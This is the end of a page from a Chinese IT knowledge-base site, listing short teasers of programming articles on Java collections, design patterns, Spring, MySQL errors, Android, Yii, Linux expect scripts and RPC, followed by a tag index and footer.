href="/search/linkedhashset/1.htm">linkedhashset</a> <div>        本篇总结一下两个常用的集合类HashSet和LinkedHashSet。         它们都实现了相同接口java.util.Set。Set表示一种元素无序且不可重复的集合；之前总结过的java.util.List表示一种元素可重复且有序</div> </li> <li><a href="/article/2042.htm" title="读《研磨设计模式》-代码笔记-备忘录模式-Memento" target="_blank">读《研磨设计模式》-代码笔记-备忘录模式-Memento</a> <span class="text-muted">bylijinnan</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a> <div>声明：本文只为方便我个人查阅和理解，详细的分析以及源代码请移步原作者的博客http://chjavach.iteye.com/ import java.util.ArrayList; import java.util.List; /* * 备忘录模式的功能是，在不破坏封装性的前提下，捕获一个对象的内部状态，并在对象之外保存这个状态，为以后的状态恢复作“备忘” </div> </li> <li><a href="/article/2169.htm" title="《RAW格式照片处理专业技法》笔记" target="_blank">《RAW格式照片处理专业技法》笔记</a> <span class="text-muted">cherishLC</span> <a class="tag" taget="_blank" href="/search/PS/1.htm">PS</a> <div>注意，这不是教程！仅记录楼主之前不太了解的一、色彩（空间）管理作者建议采用ProRGB（色域最广），但camera raw中设为ProRGB，而PS中则在ProRGB的基础上，将gamma值设为了1.8（更符合人眼）注意：bridge、camera raw怎么设置显示、输出的颜色都是正确的（会读取文件内的颜色配置文件），但用PS输出jpg文件时，必须先用Edit->conv</div> </li> <li><a href="/article/2296.htm" title="使用 Git 下载 Spring 源码编译 for Eclipse" target="_blank">使用 Git 下载 Spring 源码编译 for Eclipse</a> <span class="text-muted">crabdave</span> <a class="tag" taget="_blank" href="/search/eclipse/1.htm">eclipse</a> <div>使用 Git 下载 Spring 源码编译 for Eclipse   1、安装gradle，下载 http://www.gradle.org/downloads 配置环境变量GRADLE_HOME，配置PATH  %GRADLE_HOME%/bin，cmd，gradle -v   2、spring4 用jdk8 下载 https://jdk8.java.</div> </li> <li><a href="/article/2423.htm" title="mysql连接拒绝问题" target="_blank">mysql连接拒绝问题</a> <span class="text-muted">daizj</span> <a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a><a class="tag" taget="_blank" href="/search/%E7%99%BB%E5%BD%95%E6%9D%83%E9%99%90/1.htm">登录权限</a> <div>mysql中在其它机器连接mysql服务器时报错问题汇总一、[running]root@192.168.9.136:~$mysql -uroot -h 192.168.9.108 -p   //带-p参数，在下一步进行密码输入 Enter password:    //无字符串输入 ERROR 1045 (28000): Access </div> </li> <li><a href="/article/2550.htm" title="Google Chrome 为何打压 H.264" target="_blank">Google Chrome 为何打压 H.264</a> <span class="text-muted">dsjt</span> <a class="tag" taget="_blank" href="/search/apple/1.htm">apple</a><a class="tag" taget="_blank" href="/search/html5/1.htm">html5</a><a class="tag" taget="_blank" href="/search/chrome/1.htm">chrome</a><a class="tag" taget="_blank" href="/search/Google/1.htm">Google</a> <div>Google 今天在 Chromium 官方博客宣布由于 H.264 编解码器并非开放标准，Chrome 将在几个月后正式停止对 H.264 视频解码的支持，全面采用开放的 WebM 和 Theora 格式。 Google 在博客上表示，自从 WebM 视频编解码器推出以后，在性能、厂商支持以及独立性方面已经取得了很大的进步，为了与 Chromium 现有支持的編解码器保持一致，Chrome</div> </li> <li><a href="/article/2677.htm" title="yii 获取控制器名和方法名" target="_blank">yii 获取控制器名和方法名</a> <span class="text-muted">dcj3sjt126com</span> <a class="tag" taget="_blank" href="/search/yii/1.htm">yii</a><a class="tag" taget="_blank" href="/search/framework/1.htm">framework</a> <div>1. 获取控制器名在控制器中获取控制器名:  $name = $this->getId(); 在视图中获取控制器名:    $name = Yii::app()->controller->id;    2. 获取动作名  在控制器beforeAction()回调函数中获取动作名:  $name = </div> </li> <li><a href="/article/2804.htm" title="Android知识总结（二）" target="_blank">Android知识总结（二）</a> <span class="text-muted">come_for_dream</span> <a class="tag" taget="_blank" href="/search/android/1.htm">android</a> <div>明天要考试了，速速总结如下   1、Activity的启动模式        standard：每次调用Activity的时候都创建一个（可以有多个相同的实例，也允许多个相同Activity叠加。）        singleTop：可以有多个实例，但是不允许多个相同Activity叠加。即，如果Ac</div> </li> <li><a href="/article/2931.htm" title="高洛峰收徒第二期：寻找未来的“技术大牛” ——折腾一年，奖励20万元" target="_blank">高洛峰收徒第二期：寻找未来的“技术大牛” ——折腾一年，奖励20万元</a> <span class="text-muted">gcq511120594</span> <a class="tag" taget="_blank" href="/search/%E5%B7%A5%E4%BD%9C/1.htm">工作</a><a class="tag" taget="_blank" href="/search/%E9%A1%B9%E7%9B%AE%E7%AE%A1%E7%90%86/1.htm">项目管理</a> <div>高洛峰，兄弟连IT教育合伙人、猿代码创始人、PHP培训第一人、《细说PHP》作者、软件开发工程师、《IT峰播》主创人、PHP讲师的鼻祖！首期现在的进程刚刚过半，徒弟们真的很棒，人品都没的说，团结互助，学习刻苦，工作认真积极，灵活上进。我几乎会把他们全部留下来，现在已有一多半安排了实际的工作，并取得了很好的成绩。等他们出徒之日，凭他们的能力一定能够拿到高薪，而且我还承诺过一个徒弟，当他拿到大学毕</div> </li> <li><a href="/article/3058.htm" title="linux expect" target="_blank">linux expect</a> <span class="text-muted">heipark</span> <a class="tag" taget="_blank" href="/search/expect/1.htm">expect</a> <div>1. 创建、编辑文件go.sh   #!/usr/bin/expect spawn sudo su admin expect "*password*" { send "13456\r\n" } interact    2. 设置权限   chmod u+x go.sh  3.</div> </li> <li><a href="/article/3185.htm" title="Spring4.1新特性——静态资源处理增强" target="_blank">Spring4.1新特性——静态资源处理增强</a> <span class="text-muted">jinnianshilongnian</span> <a class="tag" taget="_blank" href="/search/spring+4.1/1.htm">spring 4.1</a> <div>目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T</div> </li> <li><a href="/article/3312.htm" title="idea ubuntuxia 乱码" target="_blank">idea ubuntuxia 乱码</a> <span class="text-muted">liyonghui160com</span> <div>  1.首先需要在windows字体目录下或者其它地方找到simsun.ttf 这个字体文件。 2.在ubuntu 下可以执行下面操作安装该字体： sudo mkdir /usr/share/fonts/truetype/simsun sudo cp simsun.ttf /usr/share/fonts/truetype/simsun fc-cache -f -v </div> </li> <li><a href="/article/3439.htm" title="改良程序的11技巧" target="_blank">改良程序的11技巧</a> <span class="text-muted">pda158</span> <a class="tag" taget="_blank" href="/search/%E6%8A%80%E5%B7%A7/1.htm">技巧</a> <div>有很多理由都能说明为什么我们应该写出清晰、可读性好的程序。最重要的一点，程序你只写一次，但以后会无数次的阅读。当你第二天回头来看你的代码时，你就要开始阅读它了。当你把代码拿给其他人看时，他必须阅读你的代码。因此，在编写时多花一点时间，你会在阅读它时节省大量的时间。   让我们看一些基本的编程技巧：   尽量保持方法简短永远永远不要把同一个变量用于多个不同的</div> </li> <li><a href="/article/3566.htm" title="300个涵盖IT各方面的免费资源（下）——工作与学习篇" target="_blank">300个涵盖IT各方面的免费资源（下）——工作与学习篇</a> <span class="text-muted">shoothao</span> <a class="tag" taget="_blank" href="/search/%E5%88%9B%E4%B8%9A/1.htm">创业</a><a class="tag" taget="_blank" href="/search/%E5%85%8D%E8%B4%B9%E8%B5%84%E6%BA%90/1.htm">免费资源</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0%E8%AF%BE%E7%A8%8B/1.htm">学习课程</a><a class="tag" taget="_blank" href="/search/%E8%BF%9C%E7%A8%8B%E5%B7%A5%E4%BD%9C/1.htm">远程工作</a> <div>工作与生产效率:   A. 背景声音 Noisli:背景噪音与颜色生成器。 Noizio:环境声均衡器。 Defonic:世界上任何的声响都可混合成美丽的旋律。 Designers.mx:设计者为设计者所准备的播放列表。 Coffitivity:这里的声音就像咖啡馆里放的一样。 B. 避免注意力分散 Self Co</div> </li> <li><a href="/article/3693.htm" title="深入浅出RPC" target="_blank">深入浅出RPC</a> <span class="text-muted">uule</span> <a class="tag" taget="_blank" href="/search/rpc/1.htm">rpc</a> <div>深入浅出RPC-浅出篇深入浅出RPC-深入篇   RPC Remote Procedure Call Protocol 远程过程调用协议   它是一种通过网络从远程计算机程序上请求服务，而不需要了解底层网络技术的协议。RPC协议假定某些传输协议的存在，如TCP或UDP，为通信程序之间携带信息数据。在OSI网络通信模型中，RPC跨越了传输层和应用层。RPC使得开发</div> </li> </ul> </div> </div> </div> <div> <div class="container"> <div class="indexes"> <strong>按字母分类：</strong> <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a> </div> </div> </div> <footer id="footer" class="mb30 mt30"> <div class="container"> <div class="footBglm"> <a target="_blank" href="/">首页</a> - <a target="_blank" href="/custom/about.htm">关于我们</a> - <a target="_blank" href="/search/Java/1.htm">站内搜索</a> - <a target="_blank" href="/sitemap.txt">Sitemap</a> - <a target="_blank" href="/custom/delete.htm">侵权投诉</a> </div> <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.  </div> </div> </footer>  <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script> <link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/> <script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script> </body> </html>